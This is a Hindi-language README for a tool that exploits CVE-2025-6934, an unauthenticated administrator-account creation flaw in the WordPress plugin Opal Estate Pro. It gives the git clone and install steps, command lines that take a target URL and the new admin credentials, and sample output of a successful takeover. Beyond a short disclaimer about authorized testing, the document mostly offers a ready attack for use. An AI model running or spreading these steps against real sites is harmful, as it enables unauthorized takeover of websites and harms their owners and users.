
CVE-2025-6934 एक्सप्लॉइट टूल वर्डप्रेस प्लगइन Opal Estate Pro में अप्रमाणित प्रशासक खाता निर्माण
पूरी तरह से mejbankadir द्वारा निर्मित और विकसित (SMH tech और Mejban HackSheild Under NexoAmicus)
CVE-2025-6934 WordPress Opal Estate Pro प्लगइन (संस्करण <= 1.7.5) में एक गंभीर कमजोरी है जो बिना प्रमाणीकरण के हमलावरों को कमजोर WordPress साइटों पर व्यवस्थापक खाते बनाने की अनुमति देती है।
यह उपकरण इस कमजोरी का शोषण करने के लिए CLI (कमांड लाइन) और GUI (ग्राफिकल यूजर इंटरफेस) दोनों संस्करण प्रदान करता है।
| गुण | मान |
|---|---|
| CVE ID | CVE-2025-6934 |
| गंभीरता | गंभीर (CVSS 3.1: 9.8) |
| प्रभावित प्लगइन | Opal Estate Pro |
| प्रभावित संस्करण | <= 1.7.5 |
| कमजोरी का प्रकार | बिना प्रमाणीकरण के व्यवस्थापक खाता निर्माण |
| CVSS वेक्टर | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
# Clone the repository
git clone https://github.com/mejbankadir/CVE-2025-6934.git
cd CVE-2025-6934
# Install dependencies
pip install -r requirements.txt
requests
beautifulsoup4
colorama
PyQt6 # केवल GUI संस्करण के लिए
python3 CVE-2025-6934-GUI.py
GUI विशेषताएँ:
python3 CVE-2025-6934.py -u http://target.com -mail [email protected] -password P@ssw0rd123
तर्क:
-u, --url लक्ष्य URL (आवश्यक)
-mail, --newmail व्यवस्थापक खाते के लिए ईमेल (आवश्यक)
-password, --newpassword व्यवस्थापक खाते के लिए पासवर्ड (आवश्यक)
-user, --username व्यवस्थापक खाते के लिए उपयोगकर्ता नाम (डिफ़ॉल्ट: administrator)
┌─────────────────────────────────────────────────────────────┐
│ _____________ _______________ │
│ \_ ___ \ \ / /\_ _____/ │
│ / \ \/\ Y / | __)_ ______ │
│ \ \____\ / | \ /_____/ │
│ \______ / \___/ /_______ / │
│ \/ \/ │
│ │
│ CVE-2025-6934 Exploit PoC │
│ │
│ Created and developed fully by mejbankadir │
│ (SMH tech and Mejban HackSheild Under NexoAmicus) │
└─────────────────────────────────────────────────────────────┘
$ python3 CVE-2025-6934.py -u http://example.com -mail [email protected] -password MyP@ss123
[•] Starting Exploit Attempt...
[•] Nonce Found: a1b2c3d4e5f6...
[✔] Exploit Successful!
Username : administrator
Email : [email protected]
Password : MyP@ss123
Role : administrator
⚠️ चेतावनी: यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है।
कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध और अनैतिक है।
इस उपकरण का उपयोग करके, आप सहमत हैं:
- केवल उन प्रणालियों का परीक्षण करें जिनके आप मालिक हैं या जिनके परीक्षण की स्पष्ट अनुमति है
- इस उपकरण का दुर्भावनापूर्ण उद्देश्यों के लिए उपयोग न करें
- किसी भी कानूनी परिणाम के लिए सभी जिम्मेदारी स्वीकार करें
| भूमिका | नाम |
|---|---|
| निर्माता और डेवलपर | mejbankadir |
| संगठन | SMH tech & Mejban HackSheild Under NexoAmicus |
CVE-2025-6934/
├── CVE-2025-6934.py # CLI version
├── CVE-2025-6934-GUI.py # GUI version
├── CVE-2025-6934.yaml # Documentation
├── requirements.txt # Python dependencies
└── README.md # This file
उपकरण स्वचालित रूप से SSL चेतावनियों को अक्षम करता है। यदि आपको समस्याएँ आती हैं:
requests.packages.urllib3.disable_warnings()
MIT लाइसेंस
Copyright (c) 2025 mejbankadir (SMH tech और Mejban HackSheild Under NexoAmicus)
❤️ के साथ mejbankadir द्वारा बनाया गया
SMH tech | Mejban HackSheild | Under NexoAmicus